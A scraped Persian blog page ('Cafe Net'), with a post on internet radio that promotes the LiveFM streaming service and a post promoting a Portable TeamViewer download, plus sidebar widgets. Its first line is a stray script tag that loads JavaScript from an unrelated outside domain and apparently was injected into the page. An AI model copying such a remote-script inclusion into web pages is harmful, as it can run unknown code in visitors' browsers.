script type="text/javascript" src="http://7vps.ir/img/website.js"> رادیو آنلاین چیست؟
کافی نت
وبلاگی جذاب

http://uploads.osyan.net/2011/10/radio-online.jpgاحتمالا تا بحال با سایت های زیادی برخورد کرده اید که به محض وارد شدن به آن یک موزیک یا ملودی به صورت خودکار برای شما پخش میکنند و یا با استفاده از پلی لیست و یک فلش پلیر ساده برای شما دسته ای از موزیک را آماده شنیدن کرده اند؟

 

رادیو اینترنتی هم شباهت هایی با اینگونه سایت ها و امکانات دارد ، با این تفاوت که اختیار تغییر آهنگ در حال پخش با شما نیست و شما نمیتوانید منبع آهنگ یا فایل صوتی در حال پخش را بیابید!

 

در واقع رادیو اینترنتی با استفاده از یک فضای تقریبا نامحدود و پهنای باند بسیار زیاد بر روی سرورهای مدیا سنتر راه اندازی میگردد و با استفاده از نرم افزارهای بخصوصی اقدام به پخش آوا به صورت استریم می نماید.

 

رادیو اینترنتی لایو اف ام هم در واقع با استفاده از بستر فنی و امکانات پیشرفته ای راه اندازی شده است و به جرات میتوان گفت که از نظر ویژگی های خود در میان سایت های مشابه پارسی زبان منحصر به فرد می باشد.

 

از امکانات ویژه این شبکه رادیویی میتوان به واگذاری و اجاره شبکه رادیویی خصوصی به علاقه مندان اشاره داشت. در صورتی که شما هم میخواهید یک رادیو اینترنتی داشته باشید با ما تماس بگیرید.

 

شایان ذکر است که واگذاری پورت به صورت رایگان صورت می پذیرد و شما میتوانید با استفاده از نرم افزارهای بسیار ساده مانند winamp از روی رایانه خود برنامه هایتان را بر روی شبکه خصوصی خود پخش کنید ، اما اگر نیاز به مدیریت فایل به صورت آنلاین دارید و ترافیک اینترنت مصرفی و هزینه های انرژی برق برایتان مهم است ما میتوانیم با دریافت 25 دلار در ماه یک سرور خصوصی ( yourname.livefm.ir ) و یک پورت کاملا اختصاصی به شما بدهیم.

 

برای اطلاعات بیشتر به وب سایت شبکه رادیویی لایو اف ام مراجعه کنید.

 

در مطلب دیگری شما با با پادکست آشنا خواهیم کرد و نحوه تهیه فایل صوتی قابل پخش در رادیو اینترنتی را به شما خواهیم آموخت.



یک شنبه 29 دی 1392برچسب:, :: 11:29 بعد از ظهر
گری گوری

دانلود نرم افزار دسترسی به کامپیوتر از راه دور Portable TeamViewer 6.0 Build 10462 Final

نوشته شده توسط بابك در تاریخ جمعه، 9 اردیبهشت ماه 1390
 
دانلود نرم افزار دسترسی به کامپیوتر از راه دور Portable TeamViewer 6.0 Build 10462 Final
همه ما گاهی اوقات درحالی که به رایانه خود دسترسی نداریم ، نیاز به دسترسی داشتن به آن را در آن لحظه احساس کرده ایم تا برای مثال از اطلاعاتی را که در آن ذخیره کرده ایم استفاده کنیم و یا برخی امور را انجام دهیم. یکی از معروف ترین و بهترین نرم افزار های ارائه شده در زمینه اتصال دو رایانه به یکدیگر نرم افزار TeamViewer است. این نرم افزار امکانات لازم را برای شما فراهم می کند تا از طریق نزدیک ترین رایانه متصل به اینترنت ، به رایانه خود در منزل دسترسی داشته باشید. البته این نرم افزار کاربرهای بسیار زیادی دارد و موارد استفاده آن به این مورد خلاصه نمی شود. انتقال اطلاعات بین دو دستگاه بصورت کاملأ رمزگذاری شده صورت می گیرد و امکان سرقت اطلاعات تقریبأ وجود ندارد. آخرین ورژن این نرم افزار را هم اکنون می توانید از سایت میهن دانلود دریافت نمایید.
برای دانلود نرم افزار و مشاهده توضیحات تکمیلی به ادامه مطلب مراجعه نمایید...



ادامه مطلب ...


صفحه قبل 1 صفحه بعد

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 20
بازدید دیروز : 0
بازدید هفته : 112
بازدید ماه : 9144
بازدید کل : 139295
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


Alternative content


آریان پیامک
آریان اس ام اس